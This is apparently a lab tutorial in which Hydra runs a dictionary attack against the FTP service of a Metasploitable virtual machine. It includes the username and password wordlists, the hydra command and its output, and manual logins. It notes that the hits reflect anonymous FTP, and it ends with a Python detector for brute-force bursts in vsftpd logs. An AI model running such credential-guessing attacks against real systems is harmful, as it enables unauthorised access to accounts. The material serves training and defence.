In this post, we will use Hydra to crack the FTP password on our Metasploitable machine.

First, we need to create two files on our Kali machine: one containing a list of possible usernames and another containing a list of possible passwords.
This is essentially a dictionary attack.
We used the following usernames and passwords files.

usernames.txt    passwords.txt
administrator    dmin
Administrator    ftp
admin            Username
username         pass
default          demo
password         Pass
root             Root
Admin            passwords
Password         password
Username         Password
Root             Login
Demo             Admin
ftp              Administrator
Ftp              Demo

Running the following command reads the usernames.txt and passwords.txt files and tries every username and password combination against the FTP service on our Metasploitable machine.

$ hydra -L usernames.txt -P passwords.txt 192.168.1.111 ftp

$ hydra -L usernames.txt -P passwords.txt 192.168.1.111 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-31 19:42:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:14/p:14), ~13 tries per task
[DATA] attacking ftp://192.168.1.111:21/
[21][ftp] host: 192.168.1.111   login: ftp   password: dmin
[21][ftp] host: 192.168.1.111   login: ftp   password: Username
[21][ftp] host: 192.168.1.111   login: ftp   password: Root
[21][ftp] host: 192.168.1.111   login: ftp   password: pass
[21][ftp] host: 192.168.1.111   login: ftp   password: ftp
[21][ftp] host: 192.168.1.111   login: ftp   password: Pass
[21][ftp] host: 192.168.1.111   login: ftp   password: demo
[21][ftp] host: 192.168.1.111   login: ftp   password: passwords
[21][ftp] host: 192.168.1.111   login: Ftp   password: dmin
[21][ftp] host: 192.168.1.111   login: Ftp   password: pass
[21][ftp] host: 192.168.1.111   login: Ftp   password: ftp
[21][ftp] host: 192.168.1.111   login: Ftp   password: Username
[21][ftp] host: 192.168.1.111   login: Ftp   password: demo
[21][ftp] host: 192.168.1.111   login: Ftp   password: Pass
[21][ftp] host: 192.168.1.111   login: Ftp   password: Root
[21][ftp] host: 192.168.1.111   login: Ftp   password: passwords
1 of 1 target successfully completed, 16 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-31 19:42:41

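Hydra was able to find 16 valid passwords. Every hit is for the login ftp or Ftp, each with eight different passwords. vsftpd treats the ftp user as the anonymous login, and an account that accepts arbitrary passwords like this is what enabled anonymous access looks like, so the finding to act on is anonymous FTP rather than 16 guessed passwords. Next, we will try to log on to Metasploitable over FTP with the tested passwords.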

┌──(test㉿kali)-[~/Desktop]
└─$ ftp 192.168.1.111
Connected to 192.168.1.111.
220 (vsFTPd 2.3.4)
Name (192.168.1.111:test): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> exit
221 Goodbye.

┌──(test㉿kali)-[~/Desktop]
└─$ ftp 192.168.1.111
Connected to 192.168.1.111.
220 (vsFTPd 2.3.4)
Name (192.168.1.111:test): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> exit
221 Goodbye.
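
From the defending side, a run like the one above (196 login tries across 14 usernames in under 40 seconds) stands out in the FTP server's log. The following Python detector is an added example, not part of the original post or of Hydra; it assumes vsftpd's native log format, and the log lines, client addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed vsftpd native log format (not xferlog); one login result per line.
LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

# Constructed sample: one user mistyping a password, one dictionary run.
SAMPLE_LOG = '''\
Sun Jan 31 19:41:10 2021 [pid 4100] [alice] FAIL LOGIN: Client "192.168.1.20"
Sun Jan 31 19:41:18 2021 [pid 4100] [alice] OK LOGIN: Client "192.168.1.20"
Sun Jan 31 19:42:05 2021 [pid 4211] [administrator] FAIL LOGIN: Client "192.168.1.50"
Sun Jan 31 19:42:05 2021 [pid 4212] [admin] FAIL LOGIN: Client "192.168.1.50"
Sun Jan 31 19:42:06 2021 [pid 4213] [root] FAIL LOGIN: Client "192.168.1.50"
Sun Jan 31 19:42:06 2021 [pid 4214] [default] FAIL LOGIN: Client "192.168.1.50"
Sun Jan 31 19:42:07 2021 [pid 4215] [demo] FAIL LOGIN: Client "192.168.1.50"
Sun Jan 31 19:42:08 2021 [pid 4216] [username] FAIL LOGIN: Client "192.168.1.50"
Sun Jan 31 19:42:09 2021 [pid 4217] [ftp] OK LOGIN: Client "192.168.1.50", anon password "dmin"
'''.splitlines()

def detect_bruteforce(lines, max_fails=5, window=timedelta(seconds=60), min_users=3):
    """Flag clients with more than max_fails failed logins across at least
    min_users distinct usernames inside one sliding time window."""
    recent = defaultdict(deque)  # client ip -> (timestamp, username) of failures
    alerts = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, user = m["ip"], m["user"].lower()
        if m["result"] == "OK":
            if ip in alerts:  # a success after a burst is the line to triage first
                alerts[ip]["ok_after_alert"].append(user)
            continue
        q = recent[ip]
        q.append((ts, user))
        while ts - q[0][0] > window:  # drop failures that fell out of the window
            q.popleft()
        users = sorted({u for _, u in q})
        if ip not in alerts and len(q) > max_fails and len(users) >= min_users:
            alerts[ip] = {"first_failure": q[0][0], "failures": len(q),
                          "usernames": users, "ok_after_alert": []}
    return alerts

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, alert)
```

The single mistyped password from 192.168.1.20 stays below the threshold, while the burst from 192.168.1.50 is flagged together with the anonymous login that followed it.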